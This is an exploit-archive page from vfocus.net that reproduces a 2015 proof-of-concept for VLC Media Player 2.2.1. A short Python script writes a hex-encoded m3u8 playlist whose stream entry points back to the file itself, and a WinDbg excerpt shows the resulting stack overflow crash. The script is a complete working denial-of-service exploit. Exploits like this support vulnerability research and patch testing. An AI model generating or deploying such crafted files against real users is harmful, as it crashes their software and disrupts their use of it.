首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VLC Media Player 2.2.1 - m3u8/m3u Crash PoC
来源:vfocus.net 作者:Farhadi 发布时间:2015-08-27  
#!/usr/bin/python
 
#
 
# VLC media player 2.2.1 m3u8/m3u Crash Proof Of Concept
 
#
 
# Author: Naser Farhadi
 
#
 
# Date: 25 August 2015 # Version: 2.2.1 # Tested on: Windows 7 SP1 (32 bit)
 
#
 
##
 
 
 
"""
 
ModLoad: 71ae0000 71b64000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
 
httplive stream: HTTP Live Streaming (/C:/Users/test/Desktop/crash.m3u8)
 
ModLoad: 6c610000 6c622000   C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll
 
(e38.554): Stack overflow - code c00000fd (first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=04234238 ecx=04234138 edx=6ef83100 esi=6ef83124 edi=00000000
 
eip=7541694b esp=04233000 ebp=06e6b4ac iopl=0         nv up ei pl zr na pe nc
 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 
KERNELBASE!FlsGetValue+0x2:
 
7541694b 55              push    ebp
 
"""
 
 
 
filename = "crash.m3u8" # Or .m3u
 
buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"
 
          "\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"
 
          "\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"
 
          "\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"
 
          "\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"
 
          "\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"
 
          "\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"
 
          "\x32\x30\x78\x33\x36\x30\r\n")
 
buffer += filename
 
open(filename, "wb").write(buffer)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZSNES 1.51 - Buffer Overflow
·FHFS - FTP/HTTP File Server 2.
·Magento Add Administrator Acco
·FENIX 0.92 - Buffer Overflow
·BSIGN 0.4.5 - Buffer Overflow
·Firefox PDF.js Privileged Java
·freeSSHd 1.3.1 - Denial of Ser
·GOM Audio 2.0.8 - (.gas) Crash
·Photo Transfer (2) 1.0 iOS - D
·Mock SMTP Server 1.0 Remote Cr
·Sysax Multi Server 6.40 SSH Co
·Easy Address Book Web Server 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved